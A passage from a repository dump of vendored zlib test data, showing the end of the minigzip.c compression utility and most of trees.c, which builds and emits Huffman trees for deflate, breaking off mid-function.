GZ_SUFFIX); #endif } in = gzopen(infile, "rb"); if (in == NULL) { fprintf(stderr, "%s: can't gzopen %s\n", prog, infile); exit(1); } out = fopen(outfile, "wb"); if (out == NULL) { perror(file); exit(1); } gz_uncompress(in, out); unlink(infile); } /* =========================================================================== * Usage: minigzip [-c] [-d] [-f] [-h] [-r] [-1 to -9] [files...] * -c : write to standard output * -d : decompress * -f : compress with Z_FILTERED * -h : compress with Z_HUFFMAN_ONLY * -r : compress with Z_RLE * -1 to -9 : compression level */ int main(int argc, char *argv[]) { int copyout = 0; int uncompr = 0; gzFile file; char *bname, outmode[20]; #if !defined(NO_snprintf) && !defined(NO_vsnprintf) snprintf(outmode, sizeof(outmode), "%s", "wb6 "); #else strcpy(outmode, "wb6 "); #endif prog = argv[0]; bname = strrchr(argv[0], '/'); if (bname) bname++; else bname = argv[0]; argc--, argv++; if (!strcmp(bname, "gunzip")) uncompr = 1; else if (!strcmp(bname, "zcat")) copyout = uncompr = 1; while (argc > 0) { if (strcmp(*argv, "-c") == 0) copyout = 1; else if (strcmp(*argv, "-d") == 0) uncompr = 1; else if (strcmp(*argv, "-f") == 0) outmode[3] = 'f'; else if (strcmp(*argv, "-h") == 0) outmode[3] = 'h'; else if (strcmp(*argv, "-r") == 0) outmode[3] = 'R'; else if ((*argv)[0] == '-' && (*argv)[1] >= '1' && (*argv)[1] <= '9' && (*argv)[2] == 0) outmode[2] = (*argv)[1]; else break; argc--, argv++; } if (outmode[3] == ' ') outmode[3] = 0; if (argc == 0) { SET_BINARY_MODE(stdin); SET_BINARY_MODE(stdout); if (uncompr) { file = gzdopen(fileno(stdin), "rb"); if (file == NULL) error("can't gzdopen stdin"); gz_uncompress(file, stdout); } else { file = gzdopen(fileno(stdout), outmode); if (file == NULL) error("can't gzdopen stdout"); gz_compress(stdin, file); } } else { if (copyout) { SET_BINARY_MODE(stdout); } do { if (uncompr) { if (copyout) { file = gzopen(*argv, "rb"); if (file == NULL) fprintf(stderr, "%s: can't gzopen %s\n", prog, *argv); else gz_uncompress(file, stdout); } else { file_uncompress(*argv); } } else { if (copyout) { FILE * in = fopen(*argv, "rb"); if (in == NULL) { perror(*argv); } else { file = gzdopen(fileno(stdout), outmode); if (file == NULL) error("can't gzdopen stdout"); gz_compress(in, file); } } else { file_compress(*argv, outmode); } } } while (argv++, --argc); } return 0; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/treebuild.xml ================================================ zip compression library ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/trees.c ================================================ /* trees.c -- output deflated data using Huffman coding * Copyright (C) 1995-2021 Jean-loup Gailly * detect_data_type() function provided freely by Cosmin Truta, 2006 * For conditions of distribution and use, see copyright notice in zlib.h */ /* * ALGORITHM * * The "deflation" process uses several Huffman trees. The more * common source values are represented by shorter bit sequences. * * Each code tree is stored in a compressed form which is itself * a Huffman encoding of the lengths of all the code strings (in * ascending order by source values). The actual code strings are * reconstructed from the lengths in the inflate process, as described * in the deflate specification. * * REFERENCES * * Deutsch, L.P.,"'Deflate' Compressed Data Format Specification". * Available in ftp.uu.net:/pub/archiving/zip/doc/deflate-1.1.doc * * Storer, James A. * Data Compression: Methods and Theory, pp. 49-50. * Computer Science Press, 1988. ISBN 0-7167-8156-5. * * Sedgewick, R. * Algorithms, p290. * Addison-Wesley, 1983. ISBN 0-201-06672-6. */ /* @(#) $Id$ */ /* #define GEN_TREES_H */ #include "deflate.h" #ifdef ZLIB_DEBUG # include #endif /* =========================================================================== * Constants */ #define MAX_BL_BITS 7 /* Bit length codes must not exceed MAX_BL_BITS bits */ #define END_BLOCK 256 /* end of block literal code */ #define REP_3_6 16 /* repeat previous bit length 3-6 times (2 bits of repeat count) */ #define REPZ_3_10 17 /* repeat a zero length 3-10 times (3 bits of repeat count) */ #define REPZ_11_138 18 /* repeat a zero length 11-138 times (7 bits of repeat count) */ local const int extra_lbits[LENGTH_CODES] /* extra bits for each length code */ = {0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0}; local const int extra_dbits[D_CODES] /* extra bits for each distance code */ = {0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13}; local const int extra_blbits[BL_CODES]/* extra bits for each bit length code */ = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7}; local const uch bl_order[BL_CODES] = {16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15}; /* The lengths of the bit length codes are sent in order of decreasing * probability, to avoid transmitting the lengths for unused bit length codes. */ /* =========================================================================== * Local data. These are initialized only once. */ #define DIST_CODE_LEN 512 /* see definition of array dist_code below */ #if defined(GEN_TREES_H) || !defined(STDC) /* non ANSI compilers may not accept trees.h */ local ct_data static_ltree[L_CODES+2]; /* The static literal tree. Since the bit lengths are imposed, there is no * need for the L_CODES extra codes used during heap construction. However * The codes 286 and 287 are needed to build a canonical tree (see _tr_init * below). */ local ct_data static_dtree[D_CODES]; /* The static distance tree. (Actually a trivial tree since all codes use * 5 bits.) */ uch _dist_code[DIST_CODE_LEN]; /* Distance codes. The first 256 values correspond to the distances * 3 .. 258, the last 256 values correspond to the top 8 bits of * the 15 bit distances. */ uch _length_code[MAX_MATCH-MIN_MATCH+1]; /* length code for each normalized match length (0 == MIN_MATCH) */ local int base_length[LENGTH_CODES]; /* First normalized length for each code (0 = MIN_MATCH) */ local int base_dist[D_CODES]; /* First normalized distance for each code (0 = distance of 1) */ #else # include "trees.h" #endif /* GEN_TREES_H */ struct static_tree_desc_s { const ct_data *static_tree; /* static tree or NULL */ const intf *extra_bits; /* extra bits for each code or NULL */ int extra_base; /* base index for extra_bits */ int elems; /* max number of elements in the tree */ int max_length; /* max bit length for the codes */ }; #ifdef NO_INIT_GLOBAL_POINTERS # define TCONST #else # define TCONST const #endif local TCONST static_tree_desc static_l_desc = {static_ltree, extra_lbits, LITERALS+1, L_CODES, MAX_BITS}; local TCONST static_tree_desc static_d_desc = {static_dtree, extra_dbits, 0, D_CODES, MAX_BITS}; local TCONST static_tree_desc static_bl_desc = {(const ct_data *)0, extra_blbits, 0, BL_CODES, MAX_BL_BITS}; /* =========================================================================== * Output a short LSB first on the stream. * IN assertion: there is enough room in pendingBuf. */ #define put_short(s, w) { \ put_byte(s, (uch)((w) & 0xff)); \ put_byte(s, (uch)((ush)(w) >> 8)); \ } /* =========================================================================== * Reverse the first len bits of a code, using straightforward code (a faster * method would use a table) * IN assertion: 1 <= len <= 15 */ local unsigned bi_reverse(unsigned code, int len) { register unsigned res = 0; do { res |= code & 1; code >>= 1, res <<= 1; } while (--len > 0); return res >> 1; } /* =========================================================================== * Flush the bit buffer, keeping at most 7 bits in it. */ local void bi_flush(deflate_state *s) { if (s->bi_valid == 16) { put_short(s, s->bi_buf); s->bi_buf = 0; s->bi_valid = 0; } else if (s->bi_valid >= 8) { put_byte(s, (Byte)s->bi_buf); s->bi_buf >>= 8; s->bi_valid -= 8; } } /* =========================================================================== * Flush the bit buffer and align the output on a byte boundary */ local void bi_windup(deflate_state *s) { if (s->bi_valid > 8) { put_short(s, s->bi_buf); } else if (s->bi_valid > 0) { put_byte(s, (Byte)s->bi_buf); } s->bi_buf = 0; s->bi_valid = 0; #ifdef ZLIB_DEBUG s->bits_sent = (s->bits_sent + 7) & ~7; #endif } /* =========================================================================== * Generate the codes for a given tree and bit counts (which need not be * optimal). * IN assertion: the array bl_count contains the bit length statistics for * the given tree and the field len is set for all tree elements. * OUT assertion: the field code is set for all tree elements of non * zero code length. */ local void gen_codes(ct_data *tree, int max_code, ushf *bl_count) { ush next_code[MAX_BITS+1]; /* next code value for each bit length */ unsigned code = 0; /* running code value */ int bits; /* bit index */ int n; /* code index */ /* The distribution counts are first used to generate the code values * without bit reversal. */ for (bits = 1; bits <= MAX_BITS; bits++) { code = (code + bl_count[bits - 1]) << 1; next_code[bits] = (ush)code; } /* Check that the bit counts in bl_count are consistent. The last code * must be all ones. */ Assert (code + bl_count[MAX_BITS] - 1 == (1 << MAX_BITS) - 1, "inconsistent bit counts"); Tracev((stderr,"\ngen_codes: max_code %d ", max_code)); for (n = 0; n <= max_code; n++) { int len = tree[n].Len; if (len == 0) continue; /* Now reverse the bits */ tree[n].Code = (ush)bi_reverse(next_code[len]++, len); Tracecv(tree != static_ltree, (stderr,"\nn %3d %c l %2d c %4x (%x) ", n, (isgraph(n) ? n : ' '), len, tree[n].Code, next_code[len] - 1)); } } #ifdef GEN_TREES_H local void gen_trees_header(void); #endif #ifndef ZLIB_DEBUG # define send_code(s, c, tree) send_bits(s, tree[c].Code, tree[c].Len) /* Send a code of the given tree. c and tree must not have side effects */ #else /* !ZLIB_DEBUG */ # define send_code(s, c, tree) \ { if (z_verbose>2) fprintf(stderr,"\ncd %3d ",(c)); \ send_bits(s, tree[c].Code, tree[c].Len); } #endif /* =========================================================================== * Send a value on a given number of bits. * IN assertion: length <= 16 and value fits in length bits. */ #ifdef ZLIB_DEBUG local void send_bits(deflate_state *s, int value, int length) { Tracevv((stderr," l %2d v %4x ", length, value)); Assert(length > 0 && length <= 15, "invalid length"); s->bits_sent += (ulg)length; /* If not enough room in bi_buf, use (valid) bits from bi_buf and * (16 - bi_valid) bits from value, leaving (width - (16 - bi_valid)) * unused bits in value. */ if (s->bi_valid > (int)Buf_size - length) { s->bi_buf |= (ush)value << s->bi_valid; put_short(s, s->bi_buf); s->bi_buf = (ush)value >> (Buf_size - s->bi_valid); s->bi_valid += length - Buf_size; } else { s->bi_buf |= (ush)value << s->bi_valid; s->bi_valid += length; } } #else /* !ZLIB_DEBUG */ #define send_bits(s, value, length) \ { int len = length;\ if (s->bi_valid > (int)Buf_size - len) {\ int val = (int)value;\ s->bi_buf |= (ush)val << s->bi_valid;\ put_short(s, s->bi_buf);\ s->bi_buf = (ush)val >> (Buf_size - s->bi_valid);\ s->bi_valid += len - Buf_size;\ } else {\ s->bi_buf |= (ush)(value) << s->bi_valid;\ s->bi_valid += len;\ }\ } #endif /* ZLIB_DEBUG */ /* the arguments must not have side effects */ /* =========================================================================== * Initialize the various 'constant' tables. */ local void tr_static_init(void) { #if defined(GEN_TREES_H) || !defined(STDC) static int static_init_done = 0; int n; /* iterates over tree elements */ int bits; /* bit counter */ int length; /* length value */ int code; /* code value */ int dist; /* distance index */ ush bl_count[MAX_BITS+1]; /* number of codes at each bit length for an optimal tree */ if (static_init_done) return; /* For some embedded targets, global variables are not initialized: */ #ifdef NO_INIT_GLOBAL_POINTERS static_l_desc.static_tree = static_ltree; static_l_desc.extra_bits = extra_lbits; static_d_desc.static_tree = static_dtree; static_d_desc.extra_bits = extra_dbits; static_bl_desc.extra_bits = extra_blbits; #endif /* Initialize the mapping length (0..255) -> length code (0..28) */ length = 0; for (code = 0; code < LENGTH_CODES-1; code++) { base_length[code] = length; for (n = 0; n < (1 << extra_lbits[code]); n++) { _length_code[length++] = (uch)code; } } Assert (length == 256, "tr_static_init: length != 256"); /* Note that the length 255 (match length 258) can be represented * in two different ways: code 284 + 5 bits or code 285, so we * overwrite length_code[255] to use the best encoding: */ _length_code[length - 1] = (uch)code; /* Initialize the mapping dist (0..32K) -> dist code (0..29) */ dist = 0; for (code = 0 ; code < 16; code++) { base_dist[code] = dist; for (n = 0; n < (1 << extra_dbits[code]); n++) { _dist_code[dist++] = (uch)code; } } Assert (dist == 256, "tr_static_init: dist != 256"); dist >>= 7; /* from now on, all distances are divided by 128 */ for ( ; code < D_CODES; code++) { base_dist[code] = dist << 7; for (n = 0; n < (1 << (extra_dbits[code] - 7)); n++) { _dist_code[256 + dist++] = (uch)code; } } Assert (dist == 256, "tr_static_init: 256 + dist != 512"); /* Construct the codes of the static literal tree */ for (bits = 0; bits <= MAX_BITS; bits++) bl_count[bits] = 0; n = 0; while (n <= 143) static_ltree[n++].Len = 8, bl_count[8]++; while (n <= 255) static_ltree[n++].Len = 9, bl_count[9]++; while (n <= 279) static_ltree[n++].Len = 7, bl_count[7]++; while (n <= 287) static_ltree[n++].Len = 8, bl_count[8]++; /* Codes 286 and 287 do not exist, but we must include them in the * tree construction to get a canonical Huffman tree (longest code * all ones) */ gen_codes((ct_data *)static_ltree, L_CODES+1, bl_count); /* The static distance tree is trivial: */ for (n = 0; n < D_CODES; n++) { static_dtree[n].Len = 5; static_dtree[n].Code = bi_reverse((unsigned)n, 5); } static_init_done = 1; # ifdef GEN_TREES_H gen_trees_header(); # endif #endif /* defined(GEN_TREES_H) || !defined(STDC) */ } /* =========================================================================== * Generate the file trees.h describing the static trees. */ #ifdef GEN_TREES_H # ifndef ZLIB_DEBUG # include # endif # define SEPARATOR(i, last, width) \ ((i) == (last)? "\n};\n\n" : \ ((i) % (width) == (width) - 1 ? ",\n" : ", ")) void gen_trees_header(void) { FILE *header = fopen("trees.h", "w"); int i; Assert (header != NULL, "Can't open trees.h"); fprintf(header, "/* header created automatically with -DGEN_TREES_H */\n\n"); fprintf(header, "local const ct_data static_ltree[L_CODES+2] = {\n"); for (i = 0; i < L_CODES+2; i++) { fprintf(header, "{{%3u},{%3u}}%s", static_ltree[i].Code, static_ltree[i].Len, SEPARATOR(i, L_CODES+1, 5)); } fprintf(header, "local const ct_data static_dtree[D_CODES] = {\n"); for (i = 0; i < D_CODES; i++) { fprintf(header, "{{%2u},{%2u}}%s", static_dtree[i].Code, static_dtree[i].Len, SEPARATOR(i, D_CODES-1, 5)); } fprintf(header, "const uch ZLIB_INTERNAL _dist_code[DIST_CODE_LEN] = {\n"); for (i = 0; i < DIST_CODE_LEN; i++) { fprintf(header, "%2u%s", _dist_code[i], SEPARATOR(i, DIST_CODE_LEN-1, 20)); } fprintf(header, "const uch ZLIB_INTERNAL _length_code[MAX_MATCH-MIN_MATCH+1]= {\n"); for (i = 0; i < MAX_MATCH-MIN_MATCH+1; i++) { fprintf(header, "%2u%s", _length_code[i], SEPARATOR(i, MAX_MATCH-MIN_MATCH, 20)); } fprintf(header, "local const int base_length[LENGTH_CODES] = {\n"); for (i = 0; i < LENGTH_CODES; i++) { fprintf(header, "%1u%s", base_length[i], SEPARATOR(i, LENGTH_CODES-1, 20)); } fprintf(header, "local const int base_dist[D_CODES] = {\n"); for (i = 0; i < D_CODES; i++) { fprintf(header, "%5u%s", base_dist[i], SEPARATOR(i, D_CODES-1, 10)); } fclose(header); } #endif /* GEN_TREES_H */ /* =========================================================================== * Initialize a new block. */ local void init_block(deflate_state *s) { int n; /* iterates over tree elements */ /* Initialize the trees. */ for (n = 0; n < L_CODES; n++) s->dyn_ltree[n].Freq = 0; for (n = 0; n < D_CODES; n++) s->dyn_dtree[n].Freq = 0; for (n = 0; n < BL_CODES; n++) s->bl_tree[n].Freq = 0; s->dyn_ltree[END_BLOCK].Freq = 1; s->opt_len = s->static_len = 0L; s->sym_next = s->matches = 0; } /* =========================================================================== * Initialize the tree data structures for a new zlib stream. */ void ZLIB_INTERNAL _tr_init(deflate_state *s) { tr_static_init(); s->l_desc.dyn_tree = s->dyn_ltree; s->l_desc.stat_desc = &static_l_desc; s->d_desc.dyn_tree = s->dyn_dtree; s->d_desc.stat_desc = &static_d_desc; s->bl_desc.dyn_tree = s->bl_tree; s->bl_desc.stat_desc = &static_bl_desc; s->bi_buf = 0; s->bi_valid = 0; #ifdef ZLIB_DEBUG s->compressed_len = 0L; s->bits_sent = 0L; #endif /* Initialize the first block of the first file: */ init_block(s); } #define SMALLEST 1 /* Index within the heap array of least frequent node in the Huffman tree */ /* =========================================================================== * Remove the smallest element from the heap and recreate the heap with * one less element. Updates heap and heap_len. */ #define pqremove(s, tree, top) \ {\ top = s->heap[SMALLEST]; \ s->heap[SMALLEST] = s->heap[s->heap_len--]; \ pqdownheap(s, tree, SMALLEST); \ } /* =========================================================================== * Compares to subtrees, using the tree depth as tie breaker when * the subtrees have equal frequency. This minimizes the worst case length. */ #define smaller(tree, n, m, depth) \ (tree[n].Freq < tree[m].Freq || \ (tree[n].Freq == tree[m].Freq && depth[n] <= depth[m])) /* =========================================================================== * Restore the heap property by moving down the tree starting at node k, * exchanging a node with the smallest of its two sons if necessary, stopping * when the heap property is re-established (each father smaller than its * two sons). */ local void pqdownheap(deflate_state *s, ct_data *tree, int k) { int v = s->heap[k]; int j = k << 1; /* left son of k */ while (j <= s->heap_len) { /* Set j to the smallest of the two sons: */ if (j < s->heap_len && smaller(tree, s->heap[j + 1], s->heap[j], s->depth)) { j++; } /* Exit if v is smaller than both sons */ if (smaller(tree, v, s->heap[j], s->depth)) break; /* Exchange v with the smallest son */ s->heap[k] = s->heap[j]; k = j; /* And continue down the tree, setting j to the left son of k */ j <<= 1; } s->heap[k] = v; } /* =========================================================================== * Compute the optimal bit lengths for a tree and update the total bit length * for the current block. * IN assertion: the fields freq and dad are set, heap[heap_max] and * above are the tree nodes sorted by increasing frequency. * OUT assertions: the field len is set to the optimal bit length, the * array bl_count contains the frequencies for each bit length. * The length opt_len is updated; static_len is also updated if stree is * not null. */ local void gen_bitlen(deflate_state *s, tree_desc *desc) { ct_data *tree = desc->dyn_tree; int max_code = desc->max_code; const ct_data *stree = desc->stat_desc->static_tree; const intf *extra = desc->stat_desc->extra_bits; int base = desc->stat_desc->extra_base; int max_length = desc->stat_desc->max_length; int h; /* heap index */ int n, m; /* iterate over the tree elements */ int bits; /* bit length */ int xbits; /* extra bits */ ush f; /* frequency */ int overflow = 0; /* number of elements with bit length too large */ for (bits = 0; bits <= MAX_BITS; bits++) s->bl_count[bits] = 0; /* In a first pass, compute the optimal bit lengths (which may * overflow in the case of the bit length tree). */ tree[s->heap[s->heap_max]].Len = 0; /* root of the heap */ for (h = s->heap_max + 1; h < HEAP_SIZE; h++) { n = s->heap[h]; bits = tree[tree[n].Dad].Len + 1; if (bits > max_length) bits = max_length, overflow++; tree[n].Len = (ush)bits; /* We overwrite tree[n].Dad which is no longer needed */ if (n > max_code) continue; /* not a leaf node */ s->bl_count[bits]++; xbits = 0; if (n >= base) xbits = extra[n - base]; f = tree[n].Freq; s->opt_len += (ulg)f * (unsigned)(bits + xbits); if (stree) s->static_len += (ulg)f * (unsigned)(stree[n].Len + xbits); } if (overflow == 0) return; Tracev((stderr,"\nbit length overflow\n")); /* This happens for example on obj2 and pic of the Calgary corpus */ /* Find the first bit length which could increase: */ do { bits = max_length - 1; while (s->bl_count[bits] == 0) bits--; s->bl_count[bits]--; /* move one leaf down the tree */ s->bl_count[bits + 1] += 2; /* move one overflow item as its brother */ s->bl_count[max_length]--; /* The brother of the overflow item also moves one step up, * but this does not affect bl_count[max_length] */ overflow -= 2; } while (overflow > 0); /* Now recompute all bit lengths, scanning in increasing frequency. * h is still equal to HEAP_SIZE. (It is simpler to reconstruct all * lengths instead of fixing only the wrong ones. This idea is taken * from 'ar' written by Haruhiko Okumura.) */ for (bits = max_length; bits != 0; bits--) { n = s->bl_count[bits]; while (n != 0) { m = s->heap[--h]; if (m > max_code) continue; if ((unsigned) tree[m].Len != (unsigned) bits) { Tracev((stderr,"code %d bits %d->%d\n", m, tree[m].Len, bits)); s->opt_len += ((ulg)bits - tree[m].Len) * tree[m].Freq; tree[m].Len = (ush)bits; } n--; } } } #ifdef DUMP_BL_TREE # include #endif /* =========================================================================== * Construct one Huffman tree and assigns the code bit strings and lengths. * Update the total bit length for the current block. * IN assertion: the field freq is set for all tree elements. * OUT assertions: the fields len and code are set to the optimal bit length * and corresponding code. The length opt_len is updated; static_len is * also updated if stree is not null. The field max_code is set. */ local void build_tree(deflate_state *s, tree_desc *desc) { ct_data *tree = desc->dyn_tree; const ct_data *stree = desc->stat_desc->static_tree; int elems = desc->stat_desc->elems; int n, m; /* iterate over heap elements */ int max_code = -1; /* largest code with non zero frequency */ int node; /* new node being created */ /* Construct the initial heap, with least frequent element in * heap[SMALLEST]. The sons of heap[n] are heap[2*n] and heap[2*n + 1]. * heap[0] is not used. */ s->heap_len = 0, s->heap_max = HEAP_SIZE; for (n = 0; n < elems; n++) { if (tree[n].Freq != 0) { s->heap[++(s->heap_len)] = max_code = n; s->depth[n] = 0; } else { tree[n].Len = 0; } } /* The pkzip format requires that at least one distance code exists, * and that at least one bit should be sent even if there is only one * possible code. So to avoid special checks later on we force at least * two codes of non zero frequency. */ while (s->heap_len < 2) { node = s->heap[++(s->heap_len)] = (max_code < 2 ? ++max_code : 0); tree[node].Freq = 1; s->depth[node] = 0; s->opt_len--; if (stree) s->static_len -= stree[node].Len; /* node is 0 or 1 so it does not have extra bits */ } desc->max_code = max_code; /* The elements heap[heap_len/2 + 1 .. heap_len] are leaves of the tree, * establish sub-heaps of increasing lengths: */ for (n = s->heap_len/2; n >= 1; n--) pqdownheap(s, tree, n); /* Construct the Huffman tree by repeatedly combining the least two * frequent nodes. */ node = elems; /* next internal node of the tree */ do { pqremove(s, tree, n); /* n = node of least frequency */ m = s->heap[SMALLEST]; /* m = node of next least frequency */ s->heap[--(s->heap_max)] = n; /* keep the nodes sorted by frequency */ s->heap[--(s->heap_max)] = m; /* Create a new node father of n and m */ tree[node].Freq = tree[n].Freq + tree[m].Freq; s->depth[node] = (uch)((s->depth[n] >= s->depth[m] ? s->depth[n] : s->depth[m]) + 1); tree[n].Dad = tree[m].Dad = (ush)node; #ifdef DUMP_BL_TREE if (tree == s->bl_tree) { fprintf(stderr,"\nnode %d(%d), sons %d(%d) %d(%d)", node, tree[node].Freq, n, tree[n].Freq, m, tree[m].Freq); } #endif /* and insert the new node in the heap */ s->heap[SMALLEST] = node++; pqdownheap(s, tree, SMALLEST); } while (s->heap_len >= 2); s->heap[--(s->heap_max)] = s->heap[SMALLEST]; /* At this point, the fields freq and dad are set. We can now * generate the bit lengths. */ gen_bitlen(s, (tree_desc *)desc); /* The field len is now set, we can generate the bit codes */ gen_codes ((ct_data *)tree, max_code, s->bl_count); } /* =========================================================================== * Scan a literal or distance tree to determine the frequencies of the codes * in the bit length tree. */ local void scan_tree(deflate_state *s, ct_data *tree, int max_code) { int n; /* iterates over all tree elements */ int prevlen = -1; /* last emitted length */ int curlen; /* length of current code */ int nextlen = tree[0].Len; /* length of next code */ int count = 0; /* repeat count of the current code */ int max_count = 7; /* max repeat count */ int min_count = 4; /* min repeat count */ if (nextlen == 0) max_count = 138, min_count = 3; tree[max_code + 1].Len = (ush)0xffff; /* guard */ for (n = 0; n <= max_code; n++) { curlen = nextlen; nextlen = tree[n + 1].Len; if (++count < max_count && curlen == nextlen) { continue; } else if (count < min_count) { s->bl_tree[curlen].Freq += count; } else if (curlen != 0) { if (curlen != prevlen) s->bl_tree[curlen].Freq++; s->bl_tree[REP_3_6].Freq++; } else if (count <= 10) { s->bl_tree[REPZ_3_10].Freq++; } else { s->bl_tree[REPZ_11_138].Freq++; } count = 0; prevlen = curlen; if (nextlen == 0) { max_count = 138, min_count = 3; } else if (curlen == nextlen) { max_count = 6, min_count = 3; } else { max_count = 7, min_count = 4; } } } /* =========================================================================== * Send a literal or distance tree in compressed form, using the codes in * bl_tree. */ local void send_tree(deflate_state *s, ct_data *tree, int max_code) { int n; /* iterates over all tree elements */ int prevlen = -1; /* last emitted length */ int curlen; /* length of current code */ int nextlen = tree[0].Len; /* length of next code */ int count = 0; /* repeat count of the current code */ int max_count = 7; /* max repeat count */ int min_count = 4; /* min repeat count */ /* tree[max_code + 1].Len = -1; */ /* guard already set */ if (nextlen == 0) max_count = 138, min_count = 3; for (n = 0; n <= max_code; n++) { curlen = nextlen; nextlen = tree[n + 1].Len; if (++count < max_count && curlen == nextlen) { continue; } else if (count < min_count) { do { send_code(s, curlen, s->bl_tree); } while (--count != 0); } else if (curlen != 0) { if (curlen != prevlen) { send_code(s, curlen, s->bl_tree); count--; } Assert(count >= 3 && count <= 6, " 3_6?"); send_code(s, REP_3_6, s->bl_tree); send_bits(s, count - 3, 2); } else if (count <= 10) { send_code(s, REPZ_3_10, s->bl_tree); send_bits(s, count - 3, 3); } else { send_code(s, REPZ_11_138, s->bl_tree); send_bits(s, count - 11, 7); } count = 0; prevlen = curlen; if (nextlen == 0) { max_count = 138, min_count = 3; } else if (curlen == nextlen) { max_count = 6, min_count = 3; } else { max_count = 7, min_count = 4; } } } /* =========================================================================== * Construct the Huffman tree for the bit lengths and return the index in * bl_order of the last bit length code to send. */ local int build_bl_tree(deflate_state *s) { int max_blindex; /* index of last bit length code of non zero freq */ /* Determine the bit length frequencies for literal and distance trees */ scan_tree(s, (ct_data *)s->dyn_ltree, s->l_desc.max_code); scan_tree(s, (ct_data *)s->dyn_dtree, s->d_desc.max_code); /* Build the bit length tree: */ build_tree(s, (tree_desc *)(&(s->bl_desc))); /* opt_len now includes the length of the tree representations, except the * lengths of the bit lengths codes and the 5 + 5 + 4 bits for the counts. */ /* Determine the number of bit length codes to send. The pkzip format * requires that at least 4 bit length codes be sent. (appnote.txt says * 3 but the actual value used is 4.) */ for (max_blindex = BL_CODES-1; max_blindex >= 3; max_blindex--) { if (s->bl_tree[bl_order[max_blindex]].Len != 0) break; } /* Update opt_len to include the bit length tree and counts */ s->opt_len += 3*((ulg)max_blindex + 1) + 5 + 5 + 4; Tracev((stderr, "\ndyn trees: dyn %ld, stat %ld", s->opt_len, s->static_len)); return max_blindex; } /* =========================================================================== * Send the header for a block using dynamic Huffman trees: the counts, the * lengths of the bit length codes, the literal tree and the distance tree. * IN assertion: lcodes >= 257, dcodes >= 1, blcodes >= 4. */ local void send_all_trees(deflate_state *s, int lcodes, int dcodes, int blcodes) { int rank; /* index in bl_order */ Assert (lcodes >= 257 && dcodes >= 1 && blcodes >= 4, "not enough codes"); Assert (lcodes <= L_CODES && dcodes <= D_CODES && blcodes <= BL_CODES, "too many codes"); Tracev((stderr, "\nbl counts: ")); send_bits(s, lcodes - 257, 5); /* not +255 as stated in appnote.txt */ send_bits(s, dcodes - 1, 5); send_bits(s, blcodes - 4, 4); /* not -3 as stated in appnote.txt */ for (rank = 0; rank < blcodes; rank++) { Tracev((stderr, "\nbl code %2d ", bl_order[rank])); send_bits(s, s->bl_tree[bl_order[rank]].Len, 3); } Tracev((stderr, "\nbl tree: sent %ld", s->bits_sent)); send_tree(s, (ct_data *)s->dyn_ltree, lcodes - 1); /* literal tree */ Tracev((stderr, "\nlit tree: sent %ld", s->bits_sent)); send_tree(s, (ct_data *)s->dyn_dtree, dcodes - 1); /* distance tree */ Tracev((stderr, "\ndist tree: sent %ld", s->bits_sent)); } /* =========================================================================== * Send a stored block */ void ZLIB_INTERNAL _tr_stored_block(deflate_state *s, charf *buf, ulg stored_len, int last) { send_bits(s, (STORED_BLOCK<<1) + last, 3); /* send block type */ bi_windup(s); /* align on byte boundary */ put_short(s, (ush)stored_len); put_short(s, (ush)~stored_len); if (stored_len) zmemcpy(s->pending_buf + s->pending, (Bytef *)buf, stored_len); s->pending += stored_len; #ifdef ZLIB_DEBUG s->compressed_len = (s->compressed_len + 3 + 7) & (ulg)~7L; s->compressed_len += (stored_len + 4) << 3; s->bits_sent += 2*16; s->bits_sent += stored_len << 3; #endif } /* =========================================================================== * Flush the bits in the bit buffer to pending output (leaves at most 7 bits) */ void ZLIB_INTERNAL _tr_flush_bits(deflate_state *s) { bi_flush(s); } /* =========================================================================== * Send one empty static block to give enough lookahead for inflate. * This takes 10 bits, of which 7 may remain in the bit buffer. */ void ZLIB_INTERNAL _tr_align(deflate_state *s) { send_bits(s, STATIC_TREES<<1, 3); send_code(s, END_BLOCK, static_ltree); #ifdef ZLIB_DEBUG s->compressed_len += 10L; /* 3 for block type, 7 for EOB */ #endif bi_flush(s); } /* =========================================================================== * Send the block data compressed using the given Huffman trees */ local void compress_block(deflate_state *s, const ct_data *ltree, const ct_data *dtree) { unsigned dist; /* distance of matched string */ int lc; /* match length or unmatched char (if dist == 0) */ unsigned sx = 0; /* running index in sym_buf */ unsigned code; /* the code to send */ int extra; /* number of extra bits to send */ if (s->sym_next != 0) do { dist = s->sym_buf[sx++] & 0xff; dist += (unsigned)(s->sym_buf[sx++] & 0xff) << 8; lc = s->sym_buf[sx++]; if (dist == 0) { send_code(s, lc, ltree); /* send a literal byte */ Tracecv(isgraph(lc), (stderr," '%c' ", lc)); } else { /* Here, lc is the match length - MIN_MATCH */ code = _length_code[lc]; send_code(s, code + LITERALS + 1, ltree); /* send length code */ extra = extra_lbits[code]; if (extra != 0) { lc -= base_length[code]; send_bits(s, lc, extra); /* send the extra length bits */ } dist--; /* dist is now the match distance - 1 */ code = d_code(dist); Assert (code < D_CODES, "bad d_code"); send_code(s, code, dtree); /* send the distance code */ extra = extra_dbits[code]; if (extra != 0) { dist -= (unsigned)base_dist[code]; send_bits(s, dist, extra); /* send the extra distance bits */ } } /* literal or match pair ? */ /* Check that the overlay between pending_buf and sym_buf is ok: */ Assert(s->pending < s->lit_bufsize + sx, "pendingBuf overflow"); } while (sx < s->sym_next); send_code(s, END_BLOCK, ltree); } /* =========================================================================== * Check if the data type is TEXT or BINARY, using the following algorithm: * - TEXT if the two conditions below are satisfied: * a) There are no non-portable control characters belonging to the * "block list" (0..6, 14..25, 28..31). * b) There is at least one printable character belonging to the * "allow list" (9 {TAB}, 10 {LF}, 13 {CR}, 32..255). * - BINARY otherwise. * - The following partially-portable control characters form a * "gray list" that is ignored in this detection algorithm: * (7 {BEL}, 8 {BS}, 11 {VT}, 12 {FF}, 26 {SUB}, 27 {ESC}). * IN assertion: the fields Freq of dyn_ltree are set. */ local int detect_data_type(deflate_state *s) { /* block_mask is the bit mask of block-listed bytes * set bits 0..6, 14..25, and 28..31 * 0xf3ffc07f = binary 11110011111111111100000001111111 */ unsigned long block_mask = 0xf3ffc07fUL; int n; /* Check for non-textual ("block-listed") bytes. */ for (n = 0; n <= 31; n++, block_mask >>= 1) 